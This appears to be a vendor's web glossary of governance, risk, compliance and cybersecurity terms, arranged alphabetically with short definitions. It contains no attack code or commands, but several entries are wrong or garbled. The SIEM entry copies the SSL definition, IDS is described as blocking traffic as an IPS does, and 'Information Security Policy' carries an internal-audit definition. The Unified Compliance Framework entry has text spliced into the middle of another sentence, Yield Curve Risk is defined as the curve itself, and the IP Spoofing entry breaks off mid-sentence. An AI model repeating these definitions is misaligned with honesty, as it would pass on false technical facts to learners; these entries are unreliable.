Expand Your Horizons.
Step into the future of GRC and Cybersecurity knowledge, where our transformative insights both inspire and elevate your understanding.
PROTECT
Cybersecurity Knowledge Hub
VisionaryPoint.
Concepts and Definitions.
Elevate Your Understanding. Learn, Explore, Enrich with Our Knowledge Hub.
GRC Terms in A
Access Control
Policies and procedures that restrict or manage access to certain information or systems within an organization.
Accountability
The expectation that individuals and organizations will be responsible for their actions and decisions.
Adherence
Conforming to or following established guidelines, policies, or regulations.
Agile Governance
Applying agile methodologies to the governance process, allowing for more flexibility and adaptability in responding to changing business environments.
Asset Management
The systematic process of developing, operating, maintaining, upgrading, and disposing of assets in a cost-effective manner.
Assessment
The process of evaluating risks and controls to determine the effectiveness of a company’s GRC practices.
Audit
An examination of processes, controls, and activities within an organization to ensure compliance with policies and regulations.
Cybersecurity Terms in A
Address Resolution Protocol Spoofing (ARP Spoofing)
An attack where the attacker sends falsified ARP messages over a local area network to link the attacker’s MAC address with the IP address of a legitimate computer or server.
Advanced Persistent Threat (APT)
A prolonged and targeted cyberattack in which an unauthorized user gains access to a network and remains undetected for an extended period.
Anonymization
The process of removing or modifying personally identifiable information from data to protect the privacy of individuals.
Application Programming Interface (API)
A set of rules that allows one software application to interact with another, often used for secure data sharing between applications.
Attack Surface
The sum of all possible entry points or vulnerabilities in a system that could be exploited by an attacker.
Attack Vector
The path or means by which a hacker gains access to a computer system or network to deliver a malicious outcome.
Availability
Ensuring that systems and data are accessible and operational when needed, and protecting against disruptions.
GRC Terms in B
Backup and Recovery
The process of creating and maintaining copies of data to ensure its availability in the event of data loss, system failure or other disruptions.
Balanced Scorecard
A strategic performance management tool that measures an organization’s activities in terms of its vision and strategies, incorporating financial and non-financial performance indicators.
Best Practices
Established methods or techniques that are widely recognized as effective and efficient in achieving specific business objectives or compliance goals.
Bribery and Corruption Controls
Policies and measures implemented to prevent and detect bribery and corruption within an organization.
Business Continuity Planning (BCP)
The process of developing and implementing strategies to ensure a business can continue operating in the event of a disaster or cybersecurity incident.
Business Ethics
The principles and standards that guide ethical behavior in business, ensuring that organizations operate with integrity and accountability.
Business Impact Analysis (BIA)
An assessment of the potential impact of disruptions to business operations, helping organizations prioritize their recovery efforts.
Cybersecurity Terms in B
Backdoor
A hidden or unauthorized means of access to a computer system, typically used for malicious purposes.
Blue Team
Security professionals responsible for defending and maintaining the security of a system or network.
Botnet
A network of compromised computers (bots) that are controlled by a single entity (botmaster) for malicious activities.
Brute Force Attack
A type of attack where an attacker systematically tries all possible combinations of passwords or encryption keys until the correct one is found.
Browser Isolation
A security approach that executes web content in a separate environment to protect the local system from malicious code.
Bring Your Own Device (BYOD)
A policy allowing employees to use their personal devices for work, raising security concerns about data protection and network access.
Bug Bounty Program
A program that rewards individuals for finding and reporting software vulnerabilities to the organization.
GRC Terms in C
Capability Maturity Model Integration (CMMI)
A framework for improving and assessing an organization’s processes, including risk management and compliance practices.
Change Management
A systematic approach to dealing with changes within an organization, ensuring that changes are implemented smoothly with minimal disruption.
Cloud Governance
Policies and processes for managing and controlling the use of cloud services to ensure compliance and mitigate risks.
Compliance
Adhering to laws, regulations, policies, and standards relevant to an organization’s operations.
Conflict of Interest
A situation in which an individual or entity has competing interests that could compromise their objectivity, leading to potential risks.
Continuous Monitoring
The ongoing process of tracking, evaluating, and managing risks and compliance in real-time rather than through periodic assessments.
Control Framework
A structured approach to defining, implementing, and managing controls within an organization to ensure compliance and manage risks.
Control Self-Assessment (CSA)
A process in which individuals within an organization assess and evaluate the effectiveness of controls related to their own activities.
Crisis Communication
The strategic communication process to manage and respond to a crisis, involving both internal and external stakeholders.
Crisis Management
The process of preparing for, responding to, recovering from, and learning from events that pose a threat to an organization.
Cybersecurity Terms in C
CIA Triad
The CIA Triad is a fundamental concept in cybersecurity, representing three core principles: Confidentiality, Integrity, Availability. These principles guide the development of effective security measures and policies.
Cloud Security
Measures and strategies to protect data, applications, and infrastructure in cloud computing environments.
Compromise Assessment
An evaluation of an organization’s systems and networks to identify signs of a security breach or compromise.
Credential Stuffing
A cyberattack method where attackers use stolen username and password combinations to gain unauthorized access to multiple accounts.
Critical Infrastructure
Systems and assets vital to a country’s functioning, such as energy, transportation, and communication, which are often targeted by cyber threats.
Cryptography
The practice and study of techniques for securing communication and data by encoding information so that only authorized parties can understand it.
Cyber Hygiene
Best practices and habits to maintain a secure online environment, including regular updates, strong passwords, and safe browsing.
Cyber Resilience
The ability of an organization to prepare for, respond to, and recover from cybersecurity incidents, ensuring business continuity.
Cyber Threat Intelligence
Information collected, analyzed, and disseminated to understand and counter cybersecurity threats.
Cybersecurity
The practice of protecting computer systems, networks, and data from theft, damage, or unauthorized access.
Cybersecurity Framework
A set of guidelines, best practices, and standards to help organizations manage and improve their cybersecurity posture.
Cross-Site Scripting (XSS)
A type of security vulnerability where attackers inject malicious scripts into web pages viewed by other users.
GRC Terms in D
Data Classification
The categorization of data based on its sensitivity, importance, and the level of protection required.
Data Governance
The management framework for ensuring high data quality, data management, data protection, and compliance with data-related regulations.
Delegation of Authority
The process of assigning decision-making authority to individuals or teams within an organization.
Disaster Recovery (DR)
The process and set of policies for recovering and restoring critical business operations after a disruptive event.
Documentation
The creation, management, and storage of records and information related to GRC processes to provide evidence of compliance and decision-making.
Document Management
The systematic control and organization of documents to ensure efficient retrieval, storage, and disposal.
Due Diligence
The process of thoroughly researching and assessing the potential risks and benefits associated with a business decision or transaction.
Cybersecurity Terms in D
Dark Web
A part of the internet that is intentionally hidden and inaccessible through standard web browsers, often associated with illegal activities.
Data Breach
Unauthorized access, disclosure, or acquisition of sensitive data.
Data Loss Prevention (DLP)
Strategies and tools to prevent unauthorized access, use, and transmission of sensitive data.
Digital Forensics
The process of collecting, analyzing, and preserving electronic evidence to investigate and respond to cybercrimes.
Distributed Denial of Service (DDoS)
An attack that overwhelms a system or network with a flood of traffic, making it unavailable to users.
Drive-By Download
Malicious software download that occurs without the user’s knowledge or consent when visiting a website.
Deep Packet Inspection (DPI)
A method of analyzing and filtering network traffic at the packet level to identify and respond to potential threats.
GRC Terms in E
E-discovery
The process of identifying, collecting, and producing electronic information in response to legal or regulatory requests.
Employee Training and Awareness
Programs and initiatives to educate employees about GRC policies, procedures, and ethical standards to ensure compliance.
Enterprise Architecture
The process of aligning an organization’s business processes, IT infrastructure, and information systems with its strategic objectives.
Enterprise Risk Management (ERM)
A comprehensive and integrated approach to managing all types of risks across an entire organization.
Environmental, Social, and Governance (ESG) Criteria
Criteria that measure a company’s performance in areas related to environmental sustainability, social responsibility, and corporate governance.
Escalation
The process of raising concerns or issues to higher levels of management or authority for resolution.
Event Management
The systematic process of identifying, assessing, prioritizing, and responding to events that could impact an organization’s objectives.
Exposure
The degree to which an organization is at risk of potential harm, loss, or negative impact.
External Audit
An independent examination of an organization’s financial statements, controls, and compliance with external standards by an external auditing firm.
Entity-Level Controls
Controls that operate at the organizational level and impact multiple business processes, ensuring overall compliance and risk management.
Cybersecurity Terms in E
Email Spoofing
The forgery of an email header to make the message appear as if it came from a trusted source.
End-to-End Encryption
A method of secure communication that prevents third-parties from accessing data while it’s transferred from one end system to another.
Endpoint Detection and Response (EDR)
A cybersecurity technology that continuously monitors and responds to advanced threats on endpoints.
Endpoint Security
Protection of computer networks that are remotely bridged to client devices.
Ethical Hacking
Authorized and legal hacking activities performed by security professionals to identify vulnerabilities in a system.
Event Logging
The recording of events or activities in a system, often used for security monitoring and analysis.
Exploit
A piece of software or sequence of commands that takes advantage of a vulnerability to cause unintended behavior in software, hardware, or electronic systems.
Eavesdropping
Unauthorized interception of private communication, often through passive monitoring.
GRC Terms in F
Fault Tree Analysis
A method used to analyze and visualize the potential causes of a specific event or failure, often employed in risk management.
Financial Risk
Risks associated with financial activities, including market risk, credit risk, and liquidity risk.
Formal Controls
Explicitly defined policies, procedures, and guidelines established by an organization to ensure compliance and manage risks.
Forensic Audit
An examination of financial records and transactions with the goal of uncovering evidence for legal proceedings, often related to fraud or financial misconduct.
Fraud Detection
The use of technology, analytics, and monitoring to identify and prevent fraudulent activities within an organization.
Fraud Prevention
Strategies, controls, and measures put in place to detect and prevent fraudulent activities within an organization.
Functional Segregation of Duties (SoD)
The practice of dividing tasks and responsibilities among different individuals or teams to prevent conflicts of interest and reduce the risk of errors or fraud.
Cybersecurity Terms in F
File Integrity Monitoring (FIM)
Monitoring and detecting changes to files for data integrity.
Firewall
A network security device or software that monitors and controls incoming and outgoing network traffic based on predetermined security rules.
Forensics
The application of scientific methods to investigate cybercrimes.
Fuzzing
Testing technique involving inputting random data to find vulnerabilities.
Full Disk Encryption (FDE)
Encryption of an entire storage device for data protection.
GRC Terms in G
Gap Analysis
The process of assessing the difference between current practices and desired objectives, often used in compliance and risk management.
General Data Protection Regulation (GDPR)
European Union regulation designed to protect the privacy and personal data of individuals, requiring organizations to adhere to specific data protection standards.
Geopolitical Risk
Risks arising from political and economic instability, trade tensions, or other geopolitical factors that can affect global business operations.
Global Risk
Risks that have the potential to impact organizations on a global scale, such as economic downturns, geopolitical events, or pandemics.
Governance
The system of rules, practices, and processes by which an organization is directed and controlled to achieve its goals while addressing risks and ensuring compliance.
Governance, Risk, and Compliance (GRC)
An integrated approach to managing the three key components of organizational success: governance, risk management, and compliance.
Green IT Governance
Governance practices focused on environmentally sustainable and energy-efficient information technology operations.
GRC Software
Software solutions designed to streamline and automate governance, risk, and compliance processes within an organization.
Cybersecurity Terms in G
Gateway
A device or software that connects different networks and serves as an entry point for data traffic.
Gray Hat Hacker
An individual who engages in both ethical and potentially malicious hacking activities.
GRC Terms in H
Harmonization
The process of aligning and standardizing policies, processes, and controls across different departments or business units to achieve consistency and efficiency.
Heat Map
A visual representation of data where values are depicted by color, often used in risk management to highlight areas of concern or priority.
Holistic Risk Management
An integrated and comprehensive approach to managing risks across an entire organization, considering various factors and interdependencies.
Hybrid Cloud Governance
Policies and controls for managing and securing data and applications in a hybrid cloud environment, which combines on-premises infrastructure with cloud services.
Cybersecurity Terms in H
Hardening
The process of securing a computer system by reducing its vulnerabilities and limiting potential attack surfaces.
Hashing
The process of converting input data (such as passwords) into a fixed-length string of characters, typically for security purposes.
Hypertext Transfer Protocol Secure (HTTPS)
A secure version of HTTP that encrypts data transmitted between a user’s browser and a website, often used for secure online transactions.
GRC Terms in I
Incident Management
The process of identifying, managing, and resolving security incidents, ensuring a rapid response to minimize the impact of security breaches.
Information Governance
The management framework for controlling and protecting information assets, ensuring their accuracy, integrity, and availability.
Information Security Policy
An independent, objective assurance and consulting activity designed to add value and improve an organization’s operations by evaluating and improving the effectiveness of risk management, control, and governance processes.
Internal Control
Policies, procedures, and practices implemented by an organization to ensure the reliability of financial reporting, compliance with laws, and safeguarding of assets.
ISO 31000
An international standard providing guidelines for risk management, outlining principles, framework, and a process for managing risk effectively.
IT Governance
The framework and practices for aligning IT strategy with business objectives, ensuring the effective use of IT resources and managing associated risks.
IT Risk
Risks associated with the use of information technology, including cybersecurity threats, data breaches, and system failures.
Cybersecurity Terms in I
Incident Response
The process of managing and mitigating the impact of a cybersecurity incident or breach.
Insider Threat
The risk posed to an organization’s security by individuals within the organization, such as employees, contractors, or business partners.
Integrity
Ensuring the accuracy and reliability of information, systems, and data.
Internet of Things Security (IoT Security)
Measures to protect internet-connected devices from cybersecurity threats.
IP Address Spoofing (IP Spoofing)
A technique where an attacker sends IP packets from a false (or « spoofed ») source address to deceive the
Identity and Access Management (IAM)
Policies, processes, and technologies that manage digital identities and control access to resources.
Indicators of Compromise (IoC)
Artifacts or behaviors that suggest a system has been compromised or under attack.
Information Security
The practice of protecting information from unauthorized access, disclosure, disruption, modification, or destruction.
Intelligence-Led Security
A proactive approach to cybersecurity that uses threat intelligence to inform decision-making and defense strategies.
Intrusion Detection System (IDS)
A security technology that actively blocks or prevents unauthorized access or malicious activities.
ISO 27001
An international standard for information security management systems, providing a framework for organizations to manage and secure their information assets.
IT Security
The protection of information technology systems and data from unauthorized access, attacks, or damage.
GRC Terms in J
Job Rotation
A practice where employees are moved between different roles within an organization to prevent fraud, increase cross-functional knowledge, and mitigate risk.
Joint Audit
An audit conducted by multiple parties, such as internal and external auditors or auditors from different business units, to assess and ensure compliance with governance and regulatory requirements.
Cybersecurity Terms in J
Jamming Attack
A cyber attack technique where the attacker disrupts or disables communication by transmitting interference signals.
JavaScript Security
Measures and practices to secure JavaScript code from vulnerabilities and malicious exploitation.
JSON Web Token (JWT)
A compact, URL-safe means of representing claims between two parties, commonly used for authentication and authorization.
GRC Terms in K
Key Risk Indicator (KRI)
A measurable metric used to assess and monitor a specific risk within an organization’s risk management framework.
Key Control Indicator (KCI)
A metric used to evaluate and measure the effectiveness of controls in managing risks.
Key Performance Indicator (KPI)
A measurable value used to assess the performance and effectiveness of an organization in achieving its goals and objectives in the context of GRC.
Key Risk Profile (KRP)
A summary of an organization’s key risks, including their potential impact, likelihood, and mitigation strategies.
Kickback
An unethical practice where a person or entity receives illegal payments or rewards in return for providing favorable treatment or business opportunities.
Knowledge Management
The process of capturing, organizing, and utilizing an organization’s knowledge and expertise to improve decision-making, collaboration, and risk management.
KYC (Know Your Customer)
A compliance process carried out by financial institutions to verify the identity of customers and assess the potential risks associated with their activities.
Cybersecurity Terms in K
Kerberos
A network authentication protocol that uses tickets to allow nodes communicating over a non-secure network to prove their identity.
Kernel
The core part of an operating system that oversees the communication between hardware and software components, including security-related operations.
Keylogger
Malicious software or hardware that records keystrokes on a computer or device, often used to capture sensitive information like passwords.
Keystroke Dynamics
A biometric authentication technique that analyzes the behavioral patterns of an individual’s keystrokes to verify their identity.
Key Exchange (KE)
A process in cryptography where two communicating entities securely exchange cryptographic keys to establish a secure communication channel.
Key Management
The process of generating, storing, handling, and protecting cryptographic keys used in encryption and decryption processes.
Knowledge-Based Authentication (KBA)
An authentication method that verifies a user’s identity by asking them questions based on personal information known to the user, such as their mother’s maiden name or the name of their first pet.
GRC Terms in L
Legal Compliance
Adherence to laws and regulations relevant to an organization’s operations, products, and services.
Legal Risk
The potential for legal actions, lawsuits, or regulatory actions that could negatively impact an organization.
Legacy System
An outdated or older computer system, software application, or technology infrastructure that is still in use within an organization.
Leveraged Risk
The additional risk introduced by using financial instruments or debt to fund business activities.
Limitation of Liability
Provisions in contracts or agreements that specify the maximum amount of liability one party may have in case of a breach or dispute.
Likelihood
The probability or chance of a risk event occurring, often assessed in qualitative or quantitative terms.
Line of Defense
The layers or functions within an organization responsible for managing and mitigating risks. Typically categorized as the first (operational management), second (risk management and compliance), and third (internal audit) lines of defense.
Logical Access Controls
Policies and procedures that restrict access to computer systems and data based on user roles, responsibilities, and authorization levels.
Loss Control
Measures and strategies implemented to prevent or reduce the impact of losses, including financial losses and reputational damage.
Loss Event
An incident or occurrence that results in financial or non-financial losses for an organization.
Loss Mitigation
Strategies and actions taken to minimize or prevent potential losses, particularly in the context of risk management.
Cybersecurity Terms in L
Least Privilege
The principle of providing individuals or systems with only the minimum levels of access or permissions needed to perform their job functions.
Lightweight Directory Access Protocol (LDAP)
A protocol used to access and manage directory information services, often used for user authentication.
Local Area Network (LAN)
A network that is limited to a small geographic area, such as a single building or campus.
Load Balancer
A device or software that distributes network traffic across multiple servers to ensure no single server is overwhelmed.
Lockscreen Ransomware
Malware that locks a user out of their device and demands payment to unlock it.
Log Management
The process of collecting, storing, and analyzing log data from computer systems to identify and respond to security incidents.
GRC Terms in M
Mandate
The authority or permission granted to an individual or entity to perform specific tasks or make decisions within an organization.
Mitigation
The process of reducing the severity or impact of a risk through preventive or corrective actions.
Mobile Device Management (MDM)
Policies and technologies used to secure and manage mobile devices within an organization, ensuring compliance and data security.
Model Risk
The risk of financial loss resulting from the use of models or statistical techniques that are incorrect or misapplied.
Monitoring
The ongoing observation and surveillance of processes, controls, and activities to ensure compliance and identify emerging risks.
Cybersecurity Terms in M
Malware
Malicious software designed to harm or exploit computer systems or networks, including viruses, worms, Trojans, and ransomware.
Man-in-the-Middle Attack (MitM)
An attack where an attacker intercepts and potentially alters communication between two parties without their knowledge.
GRC Terms in N
Need-to-Know Principle
A security principle that restricts access to sensitive information to only those individuals who require it for their job responsibilities.
Non-Compliance
Failure to adhere to laws, regulations, policies, or standards relevant to an organization’s operations.
Non-Disclosure Agreement (NDA)
A legal contract that outlines confidential information that parties share with each other and restricts its use.
Non-Discretionary Access Control
Access control policies and mechanisms that are determined by an organization’s policies and cannot be changed by individual users.
Notification of Breach
The process of informing relevant parties about a security breach or data breach, typically required by data protection regulations.
Cybersecurity Terms in N
National Institute of Standards and Technology (NIST)
A U.S. government agency that develops and promotes cybersecurity standards and best practices.
Network Access Control (NAC)
A security approach that enforces policies to control access to a network, ensuring only authorized devices can connect.
Network Address Translation (NAT)
A technique that modifies network address information in packet headers while in transit, typically to map private IP addresses to a public IP address.
Network Forensics
The process of capturing, recording, and analyzing network events to identify security incidents.
Network Security
Measures and strategies to protect computer networks from unauthorized access, attacks, or data breaches.
Next-Generation Firewall (NGFW)
A firewall that integrates additional features beyond traditional firewall capabilities, such as intrusion prevention systems (IPS) and application-layer filtering.
Non-Repudiation
A security property that prevents an individual or entity from denying the validity of their actions or commitments.
GRC Terms in O
Objective
Clear and specific goals or outcomes that an organization aims to achieve within a defined timeframe.
Operational Risk
The risk of loss resulting from inadequate or failed internal processes, systems, people, or external events.
Outsourcing
The practice of contracting out certain business functions or processes to external service providers.
Oversight
The supervision, monitoring, and review of activities and processes to ensure they align with organizational goals and comply with relevant standards.
Ownership
The assignment of responsibility for a specific task, process, or control to an individual or team within an organization.
Cybersecurity Terms in O
Open Authorization (OAuth)
An open standard for access delegation, commonly used for granting third-party applications limited access to a user’s resources.
Open Source
Software with a source code that is made available to the public, allowing anyone to view, modify, and distribute it.
Open Web Application Security Project (OWASP)
An online community that produces freely available security-related resources for web application developers.
GRC Terms in P
Policy
A set of principles, guidelines, or rules established by an organization to govern its operations and decision-making.
Policy Management:
The systematic process of developing, implementing, and monitoring organizational policies to ensure compliance.
Preventive Controls
Measures and mechanisms designed to proactively avoid or minimize the occurrence of risks and issues.
Privacy Impact Assessment (PIA)
An assessment that identifies and evaluates the potential privacy risks and impacts of a project, system, or process.
Process
A series of structured activities or steps designed to achieve a specific outcome or goal within an organization.
Process Mapping
The visual representation of a business process, illustrating its steps, inputs, outputs, and relationships.
Program Governance
The set of practices and processes for overseeing and managing an organization’s programs, ensuring alignment with strategic objectives.
Cybersecurity Terms in P
Packet Sniffing
The practice of intercepting and examining network traffic, often to capture sensitive information.
Password Hash
A cryptographic representation of a password, stored in databases instead of the actual password for security.
Patch Management
The process of planning, testing, and applying patches or updates to software and systems to address vulnerabilities and improve security.
Penetration Testing
A simulated cyberattack on a computer system, network, or web application to identify security vulnerabilities.
Phishing
A type of social engineering attack where attackers attempt to trick individuals into providing sensitive information.
Physical Security
Measures to protect physical assets, facilities, and information from unauthorized access or damage.
Proxy Server
An intermediate server that acts as a gateway between a user’s device and the internet, providing security and anonymity.
GRC Terms in Q
Quality Control
Procedures, measures, and processes implemented to ensure that products, services, or operations meet specified quality standards.
Quality Management System (QMS)
A set of policies, processes, and procedures for planning and executing an organization’s core business processes with a focus on meeting customer expectations and regulatory requirements.
Cybersecurity Terms in Q
Quarantine
Isolating or restricting access to a system, network, or device that is suspected of being compromised to prevent further harm.
Quick Response Code (QR Code)
A two-dimensional barcode that can store various types of data, often used for quick access to information or links.
Quantum Computing
A type of computing that uses the principles of quantum mechanics, potentially impacting current cryptographic methods.
GRC Terms in R
RACI Matrix
A matrix that defines and clarifies the roles and responsibilities for each task or activity within a project or business process (Responsible, Accountable, Consulted, Informed).
Residual Risk
The level of risk that remains after risk mitigation measures have been applied.
Risk
The uncertainty of an event occurring that could have an impact on achieving objectives. Risk is often assessed in terms of likelihood and potential consequences.
Risk Appetite
The level of risk that an organization is willing to accept or tolerate to achieve its objectives.
Risk Assessment
The process of identifying, analyzing, and evaluating risks to understand their potential impact on an organization.
Risk Control
Measures and actions taken to manage and mitigate identified risks within an organization.
Risk Culture
The shared values, beliefs, and behaviors within an organization that influence how risks are perceived and managed.
Risk Identification
The process of recognizing and documenting potential risks that could affect an organization’s objectives.
Risk Management
The systematic process of identifying, assessing, prioritizing, and managing risks to achieve organizational objectives.
Risk Mitigation
Actions taken to reduce the likelihood or impact of identified risks.
Risk Register
A centralized document that captures and tracks information about identified risks, including their status and mitigation plans.
Remediation
The process of correcting or resolving issues, deficiencies, or non-compliance identified during audits or assessments.
Records Management
The systematic control of an organization’s records, including their creation, storage, retrieval, and disposal, to ensure compliance and efficient business operations.
Root Cause Analysis
A methodical process for identifying the underlying causes of problems or incidents to prevent their recurrence.
Cybersecurity Terms in R
Ransomware
Malicious software that encrypts a user’s files and demands payment for their release.
Red Team
A group of security professionals who simulate cyberattacks to test and improve an organization’s defenses.
Reverse Engineering
The process of analyzing a system, software, or network to understand its design and functionality, often for security research.
Rootkit
A type of malicious software that provides unauthorized access to a computer or network while hiding its presence.
Role-Based Access Control (RBAC)
A method of restricting network access based on the roles of individual users within an organization.
Router
A network device that forwards data packets between computer networks, often providing firewall capabilities.
GRC Terms in S
Sarbanes-Oxley Act (SOX)
U.S. legislation that establishes requirements for public company boards, management, and public accounting firms to ensure transparency and accountability in financial reporting.
Scenario Analysis
The process of examining and evaluating possible future events or situations to understand their potential impact on an organization.
Social Responsibility
The ethical and transparent conduct of an organization, taking into account its impact on society, the environment, and the well-being of stakeholders.
Stakeholder
Individuals or groups that have an interest, involvement, or concern in an organization’s activities, objectives, or performance.
Strategic Risk
Risks arising from factors that may affect an organization’s ability to achieve its long-term objectives and strategic goals.
System Development Life Cycle (SDLC)
The process of planning, creating, testing, deploying, and maintaining an information system.
Systemic Risk
The risk of a widespread failure within a financial system, market, or economy that could have a cascading impact.
Cybersecurity Terms in S
Scareware
Malicious software or content designed to deceive users by presenting false security threats or misleading information, often in an attempt to trick them into paying for unnecessary products or services.
Secure Sockets Layer (SSL)
A cryptographic protocol that provides secure and encrypted communication over the internet, often used to secure sensitive information during online transactions.
Security Information and Event Management (SIEM)
A cryptographic protocol that provides secure and encrypted communication over the internet, often used to secure sensitive information during online transactions.
Social Engineering
Techniques used by hackers to manipulate or deceive individuals into revealing sensitive information or performing certain actions that compromise security.
Spoofing
The act of impersonating someone or something else in order to deceive users or systems. This can involve IP spoofing, email spoofing, or website spoofing, among others.
SQL Injection
A type of web application attack where an attacker injects malicious SQL code into a vulnerable database query, potentially allowing unauthorized access or manipulation of data.
GRC Terms in T
Third-Party Risk Management
The process of identifying, assessing, and mitigating risks associated with external vendors, suppliers, and service providers.
Testing and Assurance
Processes and activities designed to evaluate the effectiveness of controls, systems, or processes within an organization.
Time-to-Recovery (TTR)
The time it takes to restore normal operations after a disruptive event or incident.
Tone at the Top
The ethical and compliance values set by an organization’s leadership, influencing the organization’s culture and behavior.
Testing and Assurance
Processes and activities designed to evaluate the effectiveness of controls, systems, or processes within an organization.
Cybersecurity Terms in T
Trojan Horse
Malicious software disguised as legitimate software to deceive users and gain unauthorized access to a system.
Transport Layer Security (TLS)
A protocol that ensures privacy between communicating applications and users on the internet.
Threat Surface
The sum of all potential entry points or vulnerabilities in a system that can be exploited by cyber threats.
Transmission Control Protocol/Internet Protocol (TCP/IP)
The fundamental suite of protocols governing the internet.
GRC Terms in U
Underlying Controls
The foundational controls and mechanisms that support an organization’s overall governance, risk, and compliance efforts.
Unified Compliance Framework
The process of exaA framework that consolidates multiple regulatory requirements and standards into a single set of controls to simplify compliance efforts.mining and evaluating possible future events or situations to understand their potential impact on an organization.
User Access Management
The process of managing and controlling user access to information systems and data, ensuring appropriate levels of access based on roles and responsibilities.
Cybersecurity Terms in U
Unified Threat Management (UTM)
A comprehensive security solution that combines multiple security features into a single platform or appliance.
User Account Control (UAC)
A security feature in Windows operating systems that prompts users for permission before allowing certain system changes.
GRC Terms in V
Value at Risk (VaR)
A statistical measure used to quantify the potential financial loss or risk exposure within a specific time frame and confidence level.
Vendor Risk Management
The process of assessing and mitigating risks associated with third-party vendors, suppliers, and service providers.
Volatility
The degree of variation of a trading price series over time, often used in financial risk analysis.
Vulnerability
Weaknesses or flaws in a system, application, or process that could be exploited by threats to compromise the security or functionality of the system.
Cybersecurity Terms in V
Virtual Private Network (VPN)
A network technology that creates a secure and encrypted connection over a less secure network, such as the internet.
Virtual Local Area Network (VLAN)
A network segmentation technique that creates multiple logical networks within a single physical network.
GRC Terms in Y
Yield Curve Risk
A graphical representation of the relationship between the interest rates and the time to maturity for a set of fixed-income securities, often used in risk analysis and financial planning.
Cybersecurity Terms in Y
YARA Rules
YARA is a pattern-matching tool for identifying and classifying malware or other malicious activities. YARA rules are used to define conditions for recognizing specific patterns in files or processes.
GRC Terms in Z
Zero Trust
A security framework that assumes no level of trust by default, requiring verification for every access request, regardless of whether it originates from inside or outside the network perimeter.
Zone
A segment or area within a network that has a defined level of security requirements or restrictions, often used in network architecture to control and monitor access.
Cybersecurity Terms in Z
Zero-Day (0-Day)
A vulnerability in software or hardware that is unknown to the vendor or the public, making it a potential target for exploitation before a fix or patch is available.
Zero-Day Exploit
An attack that takes advantage of a software vulnerability on the same day the vulnerability becomes publicly known, with no available fix or patch.
Zone transfer
The process of replicating DNS (Domain Name System) data from a primary server to a secondary (backup) server.
Zombie network
A group of compromised computers or devices that are controlled by a hacker to perform malicious activities.